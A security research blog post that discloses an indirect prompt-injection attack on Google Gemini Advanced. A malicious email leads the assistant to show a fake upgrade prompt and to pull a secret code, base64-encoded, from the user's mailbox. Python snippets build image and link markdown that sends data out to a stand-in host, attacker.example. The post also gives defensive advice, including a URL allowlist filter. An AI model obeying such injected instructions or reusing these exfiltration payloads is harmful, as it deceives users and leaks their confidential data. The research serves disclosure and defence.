When your AI Assistant has an evil twin

How attackers can use prompt injection to coerce Gemini into performing a social engineering attack against its users

Donato Capitella

TL;DR:

  • We demonstrate how Google Gemini Advanced can be coerced into performing social engineering attacks. 
  • By sending a malicious email, attackers can manipulate Gemini's responses when analyzing the user's mailbox, causing it to display convincing messages that trick the user into revealing confidential information from other emails.
  • Currently, there is no foolproof solution to these attacks, making it crucial for users to exercise caution when interacting with LLMs that have access to their sensitive data. 

1. Introduction

The recent Google I/O 2024 event (https://io.google/2024/) highlighted a growing trend: empowering Large Language Models (LLMs) with access to user data, like emails, to provide more helpful and contextual assistance. Google Gemini Advanced, their answer to OpenAI's ChatGPT and Microsoft's Copilot, is a prime example of this trend. While these advancements offer valuable benefits, they also raise significant security concerns. One such concern is the vulnerability of LLMs to indirect prompt injection attacks, a risk we've discussed in previous articles ([1, 2, 3]).

2. Our demo scenario

The accompanying video shows the full demo scenario, in which an attacker’s email manipulates Gemini [4] into tricking the user into revealing a secret code present in a different email.

Here's how the attack unfolds: 

  • Malicious Email: An attacker sends an email containing a prompt that instructs Gemini to display a social engineering message to the user, falsely promising an upgrade to a new version of Gemini and requesting a code to activate it. Gemini is further instructed to find the confidential information the attacker is after (e.g., a recovery or MFA code) in the user's mailbox and to display it in base64 format, disguising its true nature (a sketch of this disguise step follows the list). 
  • User Interaction with Gemini: The user asks Gemini to summarize their recent emails. 
  • Prompt Injection: When Gemini processes the attacker's email, the prompt is triggered, causing Gemini to include the phishing message and instructions at the end of its summary. This malicious content appears distinct from the summary, resembling a genuine message from Gemini. 
  • Data Compromise: If the user follows the instructions and submits the "activation code," the attacker gains access to the confidential information. 

(Note: In this demonstration, the prompt is not hidden, as the user is relying on Gemini to manage their inbox and may not read the emails themselves.) 
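
To make the disguise step concrete, the Python sketch below shows why base64 works well for the attacker: the encoded string looks like a plausible "activation code" to the user, while the attacker recovers the original secret with a single decode. The secret value and the wording of the fake message are illustrative assumptions, not the exact payload used in our demo.

```python
import base64

# Illustrative values only: this is not the exact payload from our demo,
# just the shape of the disguise step the injected prompt asks Gemini to perform.

# Secret the attacker is after, e.g. a recovery or MFA code found in another email.
secret_code = "734921"

# The injected prompt asks Gemini to present the secret in base64, so the user
# does not recognise it as their own confidential data.
disguised = base64.b64encode(secret_code.encode()).decode()
print(f"Your Gemini upgrade activation code is: {disguised}")
# -> Your Gemini upgrade activation code is: NzM0OTIx

# Attacker side: once the user submits the "activation code", recovering the
# original secret takes a single decode.
recovered = base64.b64decode(disguised).decode()
assert recovered == secret_code
```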

3. Gemini's existing mitigations

Google has put considerable effort into hardening Gemini against prompt injection attacks. The attack we described had to rely on social engineering and user interaction to succeed: the user must trust and act upon the information provided by Gemini. 

Other techniques that enable automatic data exfiltration, requiring no social engineering or only minimal user interaction (such as clicking a link), were all blocked in our testing. These include:

  • Image-Based Exfiltration: A common technique for data exfiltration via prompt injection is to coerce the LLM into generating an image whose URL encodes the stolen information, allowing exfiltration without user interaction (the browser automatically requests the URL when it attempts to display the image). However, we observed that Google has implemented robust safeguards against this: in our tests, any attempt to generate such an image resulted in the chat session being terminated with an error (a sketch of this payload shape appears after this list). 
  • URL-Based Exfiltration: Similarly, attempts to have Gemini generate phishing links containing sensitive information directly in the URL (e.g., query parameters, subdomains) were unsuccessful. Google's extensive safeguards appear to effectively vet links produced by Gemini (probably in the same way as image source URLs), preventing data exfiltration through this method. 
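
For context, the sketch below reproduces the general shape of the payloads these mitigations block. The attacker domain, file names and query parameter are hypothetical; the point is simply that the exfiltrated data rides along in a URL that Gemini is asked to emit.

```python
import base64
import urllib.parse

# Hypothetical attacker domain and parameter names: this shows the shape of
# the blocked techniques, not a working exploit against Gemini.

stolen = "recovery code: 734921"
payload = base64.urlsafe_b64encode(stolen.encode()).decode()

# Image-based variant: if the model's markdown were rendered as-is, the browser
# would request the image URL and leak the data with no user interaction.
image_markdown = (
    "![loading](https://attacker.example/pixel.png?"
    + urllib.parse.urlencode({"d": payload}) + ")"
)

# URL-based variant: a phishing link carrying the same data, requiring only a click.
link_markdown = (
    "[Finish your Gemini upgrade](https://attacker.example/update?"
    + urllib.parse.urlencode({"d": payload}) + ")"
)

print(image_markdown)
print(link_markdown)
```

Blocking these URL-carrying outputs is what forces the attacker back onto the noisier social engineering route described above.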

4. Responsible disclosure

We disclosed this issue to Google on May 19th, 2024. Google acknowledged it as an Abuse Risk on May 30th, and on May 31st communicated that their internal team was already aware of the issue but would not fix it for the time being. Google's existing mitigations already prevent the most critical data exfiltration attempts, but stopping social engineering attacks like the one we demonstrated is challenging. 

5. Recommendations

The following subsections cover recommendations for users and developers of GenAI-based assistants.

5.1 Recommendations for Users

We advise users to exercise caution when using LLM assistants like Gemini or ChatGPT. These tools are undoubtedly useful, but they become dangerous when handling untrusted content from third parties, such as emails, web pages, and documents. Despite extensive testing and safeguards, the safety of responses cannot be guaranteed when untrusted content enters the LLM's prompt. 

5.2 Recommendations for Developers

Developers of LLM assistants should implement robust safeguards around LLM input and output. We discuss the key recommendations and strategies in our Building Secure LLM Applications webinar and in the associated security canvas: 

(Download: https://www.withsecure.com/content/dam/with-secure/documents/campaigns/2024-WS-Consulting_webinar_LLM-prompt-injection-defence-canvas.pdf.coredownload.pdf)

In summary: 

  • Treat LLMs as untrusted entities. 
  • Implement safeguards to minimize the attacker's operational space by: 
    • Utilizing blocklists and machine learning models to identify and filter out malicious or unwanted content in both input and output. 
    • Adopting a semantic routing solution (such as [7]) to categorize incoming queries into topics, maintaining a list of topics/questions your assistant is allowed to help with and routing all other input to a default message such as “Sorry, we can’t help with that”. 
  • Assume that harmful outputs may still occur despite safeguards. All URLs (such as those in links and images) produced by the LLM should be either blocked or validated against a list of allowed domains to prevent data exfiltration attacks (a minimal validation sketch follows this list). 
  • Apply classic application security measures, such as output encoding to prevent Cross-Site Scripting (XSS) attacks and Content Security Policy (CSP) to control the origins of external resources. 
  • Inform users that LLM-generated answers, especially those based on third-party content like emails, web pages, and documents, should be validated and not blindly trusted. 
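
As a minimal illustration of the URL-allowlisting point above, the sketch below vets links on the output side before they are rendered to the user. The allowed domains and the URL regex are assumptions for the example; a production filter would also need to cover markdown image syntax, HTML attributes and redirect chains.

```python
import re
from urllib.parse import urlparse

# Assumed allowlist for the example; replace with the domains your assistant
# is actually permitted to reference.
ALLOWED_DOMAINS = {"gemini.google.com", "support.google.com"}

URL_RE = re.compile(r"https?://[^\s)\]\"'>]+")

def sanitise_llm_output(text: str) -> str:
    """Replace any URL whose host is not on the allowlist before rendering."""
    def check(match: re.Match) -> str:
        host = urlparse(match.group(0)).hostname or ""
        allowed = host in ALLOWED_DOMAINS or host.endswith(
            tuple("." + d for d in ALLOWED_DOMAINS)
        )
        return match.group(0) if allowed else "[link removed: untrusted domain]"
    return URL_RE.sub(check, text)

print(sanitise_llm_output(
    "See https://support.google.com/gemini and https://attacker.example/u?d=NzM0OTIx"
))
# The second URL is replaced before the user (or their browser) ever sees it.
```

Combined with blocking or proxying image loads, this closes off the zero-click exfiltration channels described in section 3, leaving only attacks that require the user's active cooperation.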

6. References

  1. Should you let ChatGPT control your browser?, https://labs.withsecure.com/publications/browser-agents-llm-prompt-injection
  2. Synthetic Recollections: A Case Study in Prompt Injection for ReAct LLM Agents, https://labs.withsecure.com/publications/llm-agent-prompt-injection
  3. Domain-specific prompt injection detection, https://labs.withsecure.com/publications/detecting-prompt-injection-bert-based-classifier
  4. Google Gemini, https://gemini.google.com/
  5. LLM01:2023 - Prompt Injections. OWASP Top 10 for Large Language Model Applications, https://owasp.org/www-project-top-10-for-large-language-model-applications/Archive/0_1_vulns/Prompt_Injection.html
  6. OWASP Top 10 for Large Language Model Applications, https://owasp.org/www-project-top-10-for-large-language-model-applications/
  7. Aurelio Semantic Router, https://github.com/aurelio-labs/semantic-router

Further Resources

Generative AI – An Attacker's View

This blog explores the role of GenAI in cyber attacks, common techniques used by hackers and strategies to protect against Generative AI-driven threats.

Creatively malicious prompt engineering

The experiments demonstrated in our research proved that large language models can be used to craft email threads suitable for spear phishing attacks, “text deepfake” a person’s writing style, apply opinion to written content, write in a certain style, and craft convincing-looking fake articles, even if relevant information wasn’t included in the model’s training data. 

Domain-specific prompt injection detection

This article focuses on the detection of potential adversarial prompts by leveraging machine learning models trained to identify signs of injection attempts. We detail our approach to constructing a domain-specific dataset and fine-tuning DistilBERT for this purpose. This technical exploration focuses on integrating this classifier within a sample LLM application, covering its effectiveness in realistic scenarios.

Should you let ChatGPT control your browser?

In this article, we expand our previous analysis, with a focus on autonomous browser agents - web browser extensions that allow LLMs a degree of control over the browser itself, such as acting on behalf of users to fetch information, fill forms, and execute web-based tasks.

Case study: Synthetic recollections

This blog post presents plausible scenarios where prompt injection techniques might be used to transform a ReAct-style LLM agent into a “Confused Deputy”. This involves two sub-categories of attacks. These attacks not only compromise the integrity of the agent's operations but can also lead to unintended outcomes that could benefit the attacker or harm legitimate users.
